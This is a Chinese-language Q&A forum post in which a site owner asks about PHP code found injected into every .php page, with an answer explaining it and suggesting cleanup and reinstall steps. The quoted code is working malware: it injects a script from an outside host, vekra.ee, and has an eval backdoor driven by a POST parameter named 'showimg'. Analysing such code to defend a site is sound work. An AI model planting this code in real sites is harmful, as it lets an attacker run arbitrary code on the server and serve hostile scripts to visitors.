有人可以建议这个PHP代码会做什么?我只在每个.php页面上找到了这个代码.其他页面如js/css/php.ini都可以.这是恶意代码吗?如果是,请建议如何防止恶意活动.
这是代码:
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if(!@$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!@headers_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!@headers_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
它更有可能将您的每个页面重定向到攻击者网站。这@将停止任何错误,因此您不会从此脚本中获取任何日志。
如果您希望您的网站正常工作,您应该将其删除。
编辑:它不会重定向,但会在您的页面上注入它想要的任何内容。检查 cookie 的脚本的第二部分将添加来自其网站的 javascript,并且可以执行恶意操作。
最后一部分我认为没有人能够猜出它是什么,因为它依赖于一些 post 变量$_POST['showimg'],我猜他用 POST 攻击了你的网站。
要做的事情:更改密码,检查文件的写入权限(它们不应该是),0777备份数据库和 WordPress 模板,删除 WordPress 安装并从头开始重新安装。在您的模板中搜索他的代码,然后添加您清理过的模板。